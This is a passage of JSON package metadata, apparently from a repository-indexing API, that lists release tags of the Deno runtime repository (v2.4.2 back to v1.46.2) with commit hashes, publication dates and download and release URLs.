ifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T